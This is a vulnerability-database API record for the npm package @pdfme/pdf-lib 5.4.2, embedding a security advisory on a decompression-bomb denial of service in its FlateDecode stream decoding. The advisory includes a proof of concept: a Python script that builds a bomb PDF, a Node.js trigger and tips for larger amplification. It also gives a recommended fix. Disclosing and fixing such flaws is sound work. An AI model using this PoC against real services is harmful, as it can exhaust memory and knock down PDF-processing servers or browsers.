Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/972737?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/972737?format=api", "purl": "pkg:npm/%40pdfme/pdf-lib@5.4.2", "type": "npm", "namespace": "@pdfme", "name": "pdf-lib", "version": "5.4.2", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "5.5.10", "latest_non_vulnerable_version": "5.5.10", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360121?format=api", "vulnerability_id": "VCID-jh39-7cer-5ucg", "summary": "PDFME Affected by Decompression Bomb in FlateDecode Stream Parsing Causes Memory Exhaustion DoS\n## Summary\n\nThe `DecodeStream.ensureBuffer()` method in `@pdfme/pdf-lib` doubles its internal buffer without any upper bound on the decompressed size. A crafted PDF containing a FlateDecode stream with a high compression ratio (decompression bomb) causes unbounded memory allocation during stream decoding, leading to memory exhaustion and denial of service in both server-side (generator) and client-side (UI) contexts.\n\n## Details\n\nThe vulnerability exists in the `DecodeStream` class, which is the base class for all stream decoders including `FlateStream` (DEFLATE/zlib decompression).\n\n**Unbounded buffer growth in `ensureBuffer()`** — `packages/pdf-lib/src/core/streams/DecodeStream.ts:148-160`:\n\n```typescript\nprotected ensureBuffer(requested: number) {\n const buffer = this.buffer;\n if (requested <= buffer.byteLength) {\n return buffer;\n }\n let size = this.minBufferLength;\n while (size < requested) {\n size *= 2; // Doubles with no upper bound\n }\n const buffer2 = new Uint8Array(size); // Allocates without limit\n buffer2.set(buffer);\n return (this.buffer = buffer2);\n}\n```\n\nThe `size *= 2` loop has no maximum size check. The buffer will continue doubling until the process runs out of memory.\n\n**Unconditional full decompression in `decode()`** — `DecodeStream.ts:139-141`:\n\n```typescript\ndecode(): Uint8Array {\n while (!this.eof) this.readBlock(); // Fully decompresses before returning\n return this.buffer.subarray(0, this.bufferLength);\n}\n```\n\n**`FlateStream.readBlock()`** calls `ensureBuffer()` repeatedly during decompression — `packages/pdf-lib/src/core/streams/FlateStream.ts:272-274`:\n\n```typescript\nif (pos + 1 >= limit) {\n buffer = this.ensureBuffer(pos + 1);\n limit = buffer.length;\n}\n```\n\nAnd again at line 297-300:\n\n```typescript\nif (pos + len >= limit) {\n buffer = this.ensureBuffer(pos + len);\n limit = buffer.length;\n}\n```\n\n**Entry point via `basePdf`** — `packages/generator/src/helper.ts:42-43`:\n\n```typescript\nconst willLoadPdf = await getB64BasePdf(basePdf);\nconst embedPdf = await PDFDocument.load(willLoadPdf);\n```\n\nThe `basePdf` parameter accepts base64-encoded data, a URL, or raw bytes. When `PDFDocument.load()` parses the PDF, it encounters FlateDecode streams and decompresses them through `FlateStream` → `DecodeStream` with no size limits.\n\nThe same code path exists in the UI package at `packages/ui/src/helper.ts:292` and `packages/ui/src/hooks.ts:67`.\n\n## PoC\n\n**Step 1: Create a decompression bomb PDF**\n\n```python\n#!/usr/bin/env python3\n\"\"\"Generate a PDF decompression bomb for PoC.\"\"\"\nimport zlib\nimport struct\n\n# Create highly compressible data: 100MB of null bytes\n# compresses to ~100KB (~1000:1 ratio)\nuncompressed = b'\\x00' * (100 * 1024 * 1024) # 100 MB\ncompressed = zlib.compress(uncompressed, 9)\n\n# Minimal PDF structure with FlateDecode stream\npdf = b\"\"\"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n\n2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n\n3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]\n /Contents 4 0 R >>\nendobj\n\n4 0 obj\n<< /Filter /FlateDecode /Length \"\"\" + str(len(compressed)).encode() + b\"\"\" >>\nstream\n\"\"\" + compressed + b\"\"\"\nendstream\nendobj\n\nxref\n0 5\n\"\"\"\n# Write proper xref (simplified for PoC)\nwith open(\"bomb.pdf\", \"wb\") as f:\n f.write(pdf)\n f.write(b\"trailer << /Size 5 /Root 1 0 R >>\\nstartxref\\n0\\n%%EOF\\n\")\n\nprint(f\"Compressed size: {len(compressed)} bytes\")\nprint(f\"Decompressed size: {len(uncompressed)} bytes\")\nprint(f\"Ratio: {len(uncompressed)/len(compressed):.0f}:1\")\n```\n\n**Step 2: Trigger via @pdfme/generator**\n\n```javascript\nconst { generate } = require('@pdfme/generator');\nconst fs = require('fs');\n\nconst bombPdf = fs.readFileSync('bomb.pdf');\n\n// This will cause unbounded memory allocation during PDF parsing\ngenerate({\n template: {\n basePdf: bombPdf, // Attacker-controlled input\n schemas: [[]],\n },\n inputs: [{}],\n plugins: {},\n}).catch(err => console.error('OOM or crash:', err.message));\n```\n\n**Step 3: Observe memory exhaustion**\n\n```bash\n# Monitor memory usage — the Node.js process will consume all available memory\n# and either crash with a heap allocation failure or be OOM-killed\nnode --max-old-space-size=512 trigger.js\n# Expected: \"FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory\"\n```\n\nFor higher amplification (e.g., 10GB decompressed from ~10MB compressed), nest multiple FlateDecode layers or use a larger null-byte payload.\n\n## Impact\n\n- **Denial of Service**: Any application using `@pdfme/generator` or `@pdfme/ui` that allows users to supply PDF templates is vulnerable to memory exhaustion. A single crafted PDF can crash the Node.js process or freeze the browser tab.\n- **Server-side impact**: In server-side PDF generation pipelines, this can take down the entire service. The ~1000:1 amplification ratio means a ~100KB upload can force allocation of ~100MB+ of memory, and larger ratios are achievable.\n- **Client-side impact**: In browser-based usage (Designer/Form/Viewer components), loading a malicious template freezes the tab and may crash the browser process.\n- **No authentication bypass needed**: The attack only requires the ability to supply a `basePdf` value, which is the standard template input parameter — no elevated privileges are needed.\n\n## Recommended Fix\n\nAdd a maximum decoded size limit to `ensureBuffer()` in `packages/pdf-lib/src/core/streams/DecodeStream.ts`:\n\n```typescript\nconst MAX_DECODED_SIZE = 100 * 1024 * 1024; // 100 MB\n\nclass DecodeStream implements StreamType {\n // ... existing fields ...\n\n protected ensureBuffer(requested: number) {\n const buffer = this.buffer;\n if (requested <= buffer.byteLength) {\n return buffer;\n }\n\n if (requested > MAX_DECODED_SIZE) {\n throw new Error(\n `Decoded stream size ${requested} exceeds maximum allowed size ${MAX_DECODED_SIZE}. ` +\n `This may indicate a decompression bomb.`\n );\n }\n\n let size = this.minBufferLength;\n while (size < requested) {\n size *= 2;\n }\n\n // Cap the allocation even if the doubling overshoots\n if (size > MAX_DECODED_SIZE) {\n size = MAX_DECODED_SIZE;\n }\n\n const buffer2 = new Uint8Array(size);\n buffer2.set(buffer);\n return (this.buffer = buffer2);\n }\n}\n```\n\nOptionally, expose the limit via `PDFDocument.load()` options so consumers can tune it:\n\n```typescript\n// In LoadOptions interface:\ninterface LoadOptions {\n // ... existing options ...\n maxDecodedStreamSize?: number; // Default: 100 MB\n}\n```", "references": [ { "reference_url": "https://github.com/pdfme/pdfme", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pdfme/pdfme" }, { "reference_url": "https://github.com/pdfme/pdfme/security/advisories/GHSA-vrqm-gvq7-rrwh", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pdfme/pdfme/security/advisories/GHSA-vrqm-gvq7-rrwh" }, { "reference_url": "https://github.com/advisories/GHSA-vrqm-gvq7-rrwh", "reference_id": "GHSA-vrqm-gvq7-rrwh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vrqm-gvq7-rrwh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375011?format=api", "purl": "pkg:npm/%40pdfme/pdf-lib@5.5.10", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540pdfme/pdf-lib@5.5.10" } ], "aliases": [ "GHSA-vrqm-gvq7-rrwh" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jh39-7cer-5ucg" } ], "fixing_vulnerabilities": [], "risk_score": "3.1", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540pdfme/pdf-lib@5.4.2" }